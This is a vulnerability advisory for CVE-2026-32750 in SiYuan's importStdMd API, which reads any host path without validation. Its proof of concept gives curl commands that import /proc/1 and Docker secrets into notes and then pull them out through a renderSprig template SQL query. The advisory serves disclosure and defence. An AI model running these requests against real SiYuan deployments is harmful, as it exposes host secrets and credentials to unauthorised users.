CVE-2026-32750

Description

### Summary `POST /api/import/importStdMd` passes the `localPath` parameter directly to `model.ImportFromLocalPath` with **zero path validation**. The function recursively reads every file under the given path and permanently stores their content as SiYuan note documents in the workspace database, making them searchable and accessible to all workspace users. ### Details **File:** `kernel/api/import.go` - function `importStdMd` ```go func importStdMd(c *gin.Context) { notebook := arg["notebook"].(string) localPath := arg["localPath"].(string) // no validation whatsoever toPath := arg["toPath"].(string) err := model.ImportFromLocalPath(notebook, localPath, toPath) // ↑ calls filelock.Walk(localPath, ...) - reads entire directory tree // and writes every file's content into workspace SQLite as note blocks } ``` **`model.ImportFromLocalPath`** (`kernel/model/import.go:784`): ```go func ImportFromLocalPath(boxID, localPath string, toPath string) (err error) { // ... filelock.Walk(localPath, func(currentPath string, d fs.DirEntry, ...) error { // reads file content → converts to .sy note → stores in database }) } ``` Unlike `globalCopyFiles`, there is **no blocklist at all**. Any readable path is accepted. The imported content is **permanently stored** in the workspace SQLite database and survives restarts. **Chained attack with Bug #1 (renderSprig):** Admin imports sensitive files → content stored in `blocks` table → non-admin user queries via `querySQL` through `renderSprig`. ### PoC **Environment:** ```bash docker run -d --name siyuan -p 6806:6806 \ -v $(pwd)/workspace:/siyuan/workspace \ b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123 ``` **Exploit:** ```bash TOKEN="YOUR_ADMIN_TOKEN" # Step 1: Create a notebook to import into NOTEBOOK=$(curl -s -X POST http://localhost:6806/api/notebook/createNotebook \ -H "Authorization: Token $TOKEN" -H "Content-Type: application/json" \ -d '{"name":"Exfil"}' | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['notebook']['id'])") # Step 2: Import /proc/1/ - stores cmdline, environ, maps as notes curl -s -X POST http://localhost:6806/api/import/importStdMd \ -H "Authorization: Token $TOKEN" \ -H "Content-Type: application/json" \ -d "{\"notebook\":\"$NOTEBOOK\",\"localPath\":\"/proc/1\",\"toPath\":\"/\"}" # Step 3: Import Docker secrets (if present) curl -s -X POST http://localhost:6806/api/import/importStdMd \ -H "Authorization: Token $TOKEN" \ -H "Content-Type: application/json" \ -d "{\"notebook\":\"$NOTEBOOK\",\"localPath\":\"/run/secrets\",\"toPath\":\"/\"}" # Step 4: Any authenticated user (non-admin) queries the imported secrets curl -s -X POST http://localhost:6806/api/template/renderSprig \ -H "Authorization: Token $TOKEN" \ -H "Content-Type: application/json" \ -d '{"template":"{{range $r := (querySQL \"SELECT content FROM blocks LIMIT 50\")}}{{$r.content}}\n---\n{{end}}"}' ``` ### Impact An admin can permanently import the contents of any readable host directory into the workspace as searchable notes. Unlike `globalCopyFiles`, there is no blocklist - `/proc/`, `/etc/`, `/run/secrets/`, `/home/` are all accepted. **Data persists** in the workspace database across restarts and is accessible to Publish Service Reader accounts. Combined with the `renderSprig` SQL injection (separate advisory), a non-admin user can then read all imported secrets without any additional privileges.

Priority Score